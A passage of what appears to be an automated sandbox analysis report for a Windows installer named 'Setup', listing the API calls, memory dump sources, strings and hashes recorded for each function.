                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,6C62332F,?), ref: 6C6236B3
                                                                • Part of subcall function 6C622815: GetTokenInformation.KERNELBASE(?,/3bl,00000000,00000000,00000000,00000000,00000000,?,?,6C6236C7,?,00000001), ref: 6C622835
                                                                • Part of subcall function 6C622815: GetLastError.KERNEL32(?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C62283B
                                                                • Part of subcall function 6C622815: GetTokenInformation.KERNELBASE(?,?,00000000,?,?,?,?,6C6236C7,?,00000001,?,?,?,?,6C62332F,?), ref: 6C622863
                                                              • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 6C6236D5
                                                              • FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,6C62332F,?), ref: 6C6236E0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C620000, based on PE: true
                                                              • Associated: 00000004.00000002.3303864433.000000006C620000.00000002.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303946399.000000006C640000.00000004.00000001.01000000.0000000B.sdmp
                                                              • Associated: 00000004.00000002.3303986988.000000006C641000.00000002.00000001.01000000.0000000B.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c620000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Token$InformationProcess$ChangeCloseConvertCurrentErrorFindLastNotificationOpenString
                                                              • String ID:
                                                              • API String ID: 3562588798-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C96BFB3: __FF_MSGBANNER.LIBCMT ref: 6C96BFCC
                                                                • Part of subcall function 6C96BFB3: __NMSG_WRITE.LIBCMT ref: 6C96BFD3
                                                                • Part of subcall function 6C96BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C94831D,00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96BFF8
                                                              • std::exception::exception.LIBCMT ref: 6C96C0F9
                                                              • std::exception::exception.LIBCMT ref: 6C96C113
                                                              • __CxxThrowException@8.LIBCMT ref: 6C96C124
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                              • String ID:
                                                              • API String ID: 615853336-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C4A91D1
                                                                • Part of subcall function 6C4A8FCB: __FF_MSGBANNER.LIBCMT ref: 6C4A8FE4
                                                                • Part of subcall function 6C4A8FCB: __NMSG_WRITE.LIBCMT ref: 6C4A8FEB
                                                                • Part of subcall function 6C4A8FCB: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,6C4A91D6,?), ref: 6C4A9010
                                                              • std::exception::exception.LIBCMT ref: 6C4A9206
                                                              • std::exception::exception.LIBCMT ref: 6C4A9220
                                                              • __CxxThrowException@8.LIBCMT ref: 6C4A9231
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                              • String ID:
                                                              • API String ID: 615853336-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32(00000000,00032AE3), ref: 000335E8
                                                              • __malloc_crt.LIBCMT ref: 00033617
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00033624
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Offset: 00030000, based on PE: true
                                                              • Associated: 00000004.00000002.3249837396.0000000000030000.00000002.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.3251530207.0000000000038000.00000004.00000001.01000000.00000009.sdmp
                                                              • Associated: 00000004.00000002.3252634934.000000000003A000.00000002.00000001.01000000.00000009.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_30000_Setup.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                                              • String ID:
                                                              • API String ID: 237123855-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetSystemInfo.KERNEL32(?), ref: 6C915562
                                                                • Part of subcall function 6C914FAC: _memset.LIBCMT ref: 6C914FB4
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3InfoSystem_memset
                                                              • String ID: %s - %s %s %s$Unknown OS
                                                              • API String ID: 3853411852-1218788732
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92439E
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A5D0: __EH_prolog3.LIBCMT ref: 6C91A5D7
                                                                • Part of subcall function 6C91A5D0: SysFreeString.OLEAUT32(?), ref: 6C91A62B
                                                                • Part of subcall function 6C948863: _wcschr.LIBCMT ref: 6C94887A
                                                                • Part of subcall function 6C9244EA: __EH_prolog3.LIBCMT ref: 6C9244F1
                                                                • Part of subcall function 6C9244EA: __CxxThrowException@8.LIBCMT ref: 6C9245E9
                                                                • Part of subcall function 6C924613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92468D
                                                                • Part of subcall function 6C924613: RegCloseKey.ADVAPI32(?,00000034,00000034,00000000,00000000,?,00000034,RegKey,?,RegValueName,00000034,6C9242F8,6C90A794,02642228), ref: 6C92469E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Close$Exception@8FreeStringThrow_wcschr
                                                              • String ID: RegKey$RegValueName
                                                              • API String ID: 3842226755-3571311812
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C92426C
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A63E: __EH_prolog3.LIBCMT ref: 6C91A645
                                                                • Part of subcall function 6C91A63E: SysFreeString.OLEAUT32(?), ref: 6C91A69B
                                                                • Part of subcall function 6C924397: __EH_prolog3.LIBCMT ref: 6C92439E
                                                              • GetUserDefaultUILanguage.KERNEL32(6C90A794,02642228), ref: 6C924302
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DefaultFreeLanguageStringUser
                                                              • String ID: LCIDHint
                                                              • API String ID: 188276182-1583853939
                                                              • Opcode ID: 36ce736aa62736b3ff5b220d94dfc464c4e12403ad4d21b537007d8cfe584c4e
                                                              • Instruction ID: ebeb746931d8938832bba1dabcc84ee5bcf4edf0fb0b163b9565e67b72841058
                                                              • Opcode Fuzzy Hash: 36ce736aa62736b3ff5b220d94dfc464c4e12403ad4d21b537007d8cfe584c4e
                                                              • Instruction Fuzzy Hash: 67419071A10209DFDB04CBA8C984ADE77B9BF54318F204558E465EBA94CB35DE05CF60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetThreadLocale.KERNEL32(00000000), ref: 6C49E1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: LocaleThread
                                                              • String ID: UiInfo.xml
                                                              • API String ID: 635194068-3938134364
                                                              • Opcode ID: 2de1712a3ec46e2d7f1613997e54c376758ddd9bdad3b042a9813642c2ac061f
                                                              • Instruction ID: 6466b577d70369b2ea9d9d2a4b8871de44a1733c5204683cb55cfeef26f649c9
                                                              • Opcode Fuzzy Hash: 2de1712a3ec46e2d7f1613997e54c376758ddd9bdad3b042a9813642c2ac061f
                                                              • Instruction Fuzzy Hash: 09416C756087409FD710DF68C488F5ABBE4BB49318F104A1DF8A687B90DB35E909CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C936E4D
                                                                • Part of subcall function 6C9350B2: __EH_prolog3.LIBCMT ref: 6C9350B9
                                                                • Part of subcall function 6C9350B2: GetLastError.KERNEL32(00000000,LoadLibrary,00000000,0000000C,6C936E7F,00000000,?), ref: 6C935110
                                                                • Part of subcall function 6C9350B2: __CxxThrowException@8.LIBCMT ref: 6C93512D
                                                              • GetCommandLineW.KERNEL32(00000000,?), ref: 6C936E8F
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                                • Part of subcall function 6C913A16: __EH_prolog3.LIBCMT ref: 6C913A1D
                                                                • Part of subcall function 6C93516F: FreeLibrary.KERNEL32(00000000,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C93517C
                                                                • Part of subcall function 6C93516F: LoadLibraryW.KERNEL32(?,?,?,6C9350F8,00000000,0000000C,6C936E7F,00000000,?), ref: 6C935194
                                                                • Part of subcall function 6C96C0AA: _malloc.LIBCMT ref: 6C96C0C4
                                                                • Part of subcall function 6C95ABA1: __EH_prolog3.LIBCMT ref: 6C95ABA8
                                                                • Part of subcall function 6C95ABA1: GetProcAddress.KERNEL32(00000004,CreateClassFactory), ref: 6C95ABB8
                                                                • Part of subcall function 6C95ABA1: GetLastError.KERNEL32 ref: 6C95ABC6
                                                                • Part of subcall function 6C95ABA1: __CxxThrowException@8.LIBCMT ref: 6C95AC7D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ErrorException@8LastLibraryThrow$AddressCommandFreeLineLoadProc_malloc
                                                              • String ID: passive
                                                              • API String ID: 304155978-1995439567
                                                              • Opcode ID: e70d1da28719a52b4261b04501e25754a9daa91b28f1dfc0605e08345421c2d9
                                                              • Instruction ID: e5e0d4f92f3be33dacc54570b03683b4c1d6ca11f6d91e6395a2613fd7312cc7
                                                              • Opcode Fuzzy Hash: e70d1da28719a52b4261b04501e25754a9daa91b28f1dfc0605e08345421c2d9
                                                              • Instruction Fuzzy Hash: 9231CA729153299BDB10DFA4C8007DDBBB4BF28318F145959E859ABF80CB70DA18CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94926F
                                                                • Part of subcall function 6C9502A3: __EH_prolog3.LIBCMT ref: 6C9502AA
                                                                • Part of subcall function 6C9502A3: GetCommandLineW.KERNEL32(0000001C,6C949382,02642228,6C90A794,?,6C91BFC7,00000018,6C91BC3C,0264224C,?,?,?,?,?,?,UserExperienceDataCollection), ref: 6C9502AF
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CommandLine
                                                              • String ID: Policy$UserExperienceDataCollection
                                                              • API String ID: 1384747822-3168315836
                                                              • Opcode ID: 56dd4e82b7e07c52c55ad85a4e662a6d45ae9f4eb721615215f69c84dabcb1e3
                                                              • Instruction ID: 4e9dbe387b83975a01512b92f634e76afee41bd6f371f94ec49cd8160d405f2e
                                                              • Opcode Fuzzy Hash: 56dd4e82b7e07c52c55ad85a4e662a6d45ae9f4eb721615215f69c84dabcb1e3
                                                              • Instruction Fuzzy Hash: 4F319070A01249DFDB04DFA8C944BAE7BB9BF65318F148558F815DBB81CB30DA04CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C921EC6
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C9219AD: __EH_prolog3.LIBCMT ref: 6C9219B4
                                                                • Part of subcall function 6C9219AD: __CxxThrowException@8.LIBCMT ref: 6C921ADE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: BlockIf$DisplayText
                                                              • API String ID: 2489616738-2498774408
                                                              • Opcode ID: a4a3a40d56413861a86e4c68623c513436be27123e8e856df3900707b39b9229
                                                              • Instruction ID: 8533f06820f821bf05b515a16859376c654c2ff76044dae1dc706ff185006379
                                                              • Opcode Fuzzy Hash: a4a3a40d56413861a86e4c68623c513436be27123e8e856df3900707b39b9229
                                                              • Instruction Fuzzy Hash: E7318E71910209AFCF04CFA8C941ADE77B9BF65358F148549F820ABB40C730EE19CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9257EC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              • _memcpy_s.LIBCMT ref: 6C925887
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$_memcpy_s
                                                              • String ID: #(loc.
                                                              • API String ID: 1663610674-1630946291
                                                              • Opcode ID: 95bf39cb08b32f6da06ee43ae991302a747deb2eeca690c793e79cdc3ffcc9c6
                                                              • Instruction ID: 34bc240620d1e3babedfa851338febb70ba82cc92e69903bb9b596348699645f
                                                              • Opcode Fuzzy Hash: 95bf39cb08b32f6da06ee43ae991302a747deb2eeca690c793e79cdc3ffcc9c6
                                                              • Instruction Fuzzy Hash: EB31A032900205AFCF04DFA8C844ADD77A5BF20368F148A56E924AFF94D770EE09CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: RepairOverride$UninstallOverride
                                                              • API String ID: 431132790-715699446
                                                              • Opcode ID: dc7af6623c0399947e6d9b59a5875d5af02fe7f2860c8b1c2e10de866dc7d4e6
                                                              • Instruction ID: e7a064ae021089110d85042facbcc1e6570b6707706d32be44374822ae4fed65
                                                              • Opcode Fuzzy Hash: dc7af6623c0399947e6d9b59a5875d5af02fe7f2860c8b1c2e10de866dc7d4e6
                                                              • Instruction Fuzzy Hash: C2314172600745DFDB14CFA4C8427DEB7B9BF14314F10894EA5A59BB50C730D614CBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000100,?,?,00000000), ref: 6C4A7AFC
                                                                • Part of subcall function 6C4A7F08: GetLastError.KERNEL32(6C4A7B0B,?,?,?,00000000), ref: 6C4A7F08
                                                              • GetTempFileNameW.KERNEL32(?,TFR,00000000,?,?,?,?,00000000), ref: 6C4A7B54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Temp$ErrorFileLastNamePath
                                                              • String ID: TFR
                                                              • API String ID: 3373471080-3081930533
                                                              • Opcode ID: dfa37a95e924bbc7cb29138f178cf68bb50e2c41371fef45495147298ae055c2
                                                              • Instruction ID: dc0d4d315b89223d51b855b823b8db041a6a3e475f54b861b547bcf7fb971042
                                                              • Opcode Fuzzy Hash: dfa37a95e924bbc7cb29138f178cf68bb50e2c41371fef45495147298ae055c2
                                                              • Instruction Fuzzy Hash: C421FDF1A052186AEB20DB94CC44FDA77BCAB15318F5046A5F314E36C8D770DA868B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9189BE
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                                • Part of subcall function 6C91838A: __EH_prolog3.LIBCMT ref: 6C918391
                                                                • Part of subcall function 6C918415: __EH_prolog3.LIBCMT ref: 6C91841C
                                                                • Part of subcall function 6C91A378: __EH_prolog3.LIBCMT ref: 6C91A37F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C918A89
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                              Strings
                                                              • schema validation error: element name is wrong: , xrefs: 6C918A0C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$DispatcherExceptionException@8ThrowUser
                                                              • String ID: schema validation error: element name is wrong:
                                                              • API String ID: 3417717588-568579515
                                                              • Opcode ID: 4c9683826ba8f3292a1c417d19f29c7920d73cbb4755720aa1bdcf85239f3c74
                                                              • Instruction ID: 5b4ef47ee0dd170523d8e540557fb55bdef416b70d4463871a450aa01cd3232b
                                                              • Opcode Fuzzy Hash: 4c9683826ba8f3292a1c417d19f29c7920d73cbb4755720aa1bdcf85239f3c74
                                                              • Instruction Fuzzy Hash: 28319A31901149EBDB04DBE4C945BEEB7B8AF25318F24469AE011E7BC0CB30DA09CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C94EA7B
                                                              • GetComputerObjectNameW.SECUR32(00000007,00000000,6C94FA6E), ref: 6C94EAC0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: ComputerH_prolog3NameObject
                                                              • String ID: microsoft.com
                                                              • API String ID: 4212761916-499418652
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C947DB7
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C914CB2: __EH_prolog3.LIBCMT ref: 6C914CB9
                                                                • Part of subcall function 6C91395E: __EH_prolog3.LIBCMT ref: 6C913965
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Operation Type$Operation: %s
                                                              • API String ID: 431132790-3288381836
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9236FF
                                                                • Part of subcall function 6C9238A1: __EH_prolog3.LIBCMT ref: 6C9238A8
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
